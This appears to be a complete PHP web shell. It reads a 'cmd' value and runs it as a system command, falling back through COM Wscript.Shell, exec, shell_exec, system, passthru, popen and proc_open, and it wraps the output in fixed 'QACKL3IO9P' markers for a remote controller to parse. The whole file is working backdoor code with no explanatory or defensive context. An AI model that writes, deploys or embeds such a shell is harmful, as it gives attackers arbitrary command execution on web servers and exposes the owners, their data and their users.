header("Content-Type: text/html; charset=gbk");
if(!isset($cmd)) die("cmd not set");
$iswin =  stristr(PHP_OS,"win")?true:false;
$str_empty = "";
if($iswin && class_exists('COM'))
{ 
try
{
$wscript = new COM('Wscript.Shell');
$exec = $wscript->exec('c:\\windows\\system32\\cmd.exe /c '.$cmd);
$stdout = $exec->StdOut();
$res = $stdout->ReadAll();
if(!empty($res))
{echo "QACKL3IO9P==".$res."==QACKL3IO9P";exit;}
}
catch(Exception $e){$e->getMessage();}
} 
$cwd = getcwd();
chdir($cwd);
echo "QACKL3IO9P==";
if(php_method0($cmd)||php_method1($cmd,$iswin,$cwd))
{
	echo "==QACKL3IO9P";
	exit;
}
function php_method0($cmd)
{
$res = $tmp = '';
try{
if(function_exists('exec')){@exec($cmd,$tmp);if(!empty($tmp)){$res = join("\n",$tmp);}}
if(empty($res) && function_exists('shell_exec')){$res = @shell_exec ($cmd);}
if(empty($res) && function_exists('system')){ob_start();@system ($cmd);$res = ob_get_contents();ob_end_clean();} 
if(empty($res) && function_exists('passthru')) {ob_start();@passthru ($cmd);$res = ob_get_contents();ob_end_clean();} 
echo $res;
return !empty($res);
}
catch(Exception $e){$e->getMessage();return false;} 
}
function php_method1($cmd,$iswin,$cwd)
{
$res = '';
$fail = true;
if(function_exists('popen'))
{
try{
$fp = @popen ($cmd,'r');
if($fp) { while(!feof($fp)) { $res .= fread($fp,1024);}} 
@pclose($fp);
$fail = true;}
catch(Exception $e){$e->getMessage();$fail = false;} 
}
if(empty($res) && function_exists('proc_open'))
{
try{
$env = $iswin ? array('path' => 'c:\\windows\\system32') : array('path' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');
$des = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w"));
$process = @proc_open ($cmd,$des,$pipes,$cwd,$env);
if(is_resource($process)) 
{ fwrite($pipes[0],$cmd);
fclose($pipes[0]);
$res .= stream_get_contents($pipes[1]);
fclose($pipes[1]);
$res .= stream_get_contents($pipes[2]);
fclose($pipes[2]);
} 
$fail = true;
@proc_close($process);}
catch(Exception $e){$e->getMessage();$fail = false;}
} 
echo $res;
return $fail;
}